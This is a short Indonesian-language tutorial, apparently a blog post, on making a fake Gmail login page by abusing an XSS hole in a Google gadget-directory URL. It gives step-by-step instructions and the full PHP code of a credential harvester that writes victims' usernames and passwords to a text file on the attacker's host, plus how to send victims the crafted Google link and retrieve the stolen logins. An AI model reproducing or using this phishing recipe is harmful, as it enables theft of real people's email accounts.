Tutorial kali ini membuat Fake gmail login dengan memanfaatkan Bug XSS yang ada di situs Google dengan alamat url http://www.google.com/ig/directory?url=
1. Buat coding dengan format XML, seperti ini http://inwepo.com/test/google.xml
2. Buat coding PHP, berikut ini :
<?php
$username = $_POST['username'];
$password = $_POST['password'];
$logs = "save.txt";
$ld = fopen($logs, 'a') or die(" ");
$data = "$username:$password \n";
fwrite($ld, $data);
echo "Sorry this is Phishing!";
?>
Simpan dengan nama save.php
3. Kemudian upload semua script ke hosting kamu.
4. Akses dengan alamat sesuai nama domain kamu contohnya http://www.google.com/ig/directory?url=inwepo.com/test/google.xml
5. Bila ada seseorang yang mencoba login maka username dan password akan otomatis tersimpan di file txt. Akses dengan alamat http://inwepo.com/test/save.txt
Sekian, semoga Google mau memperbaiki Bug XSS ini :)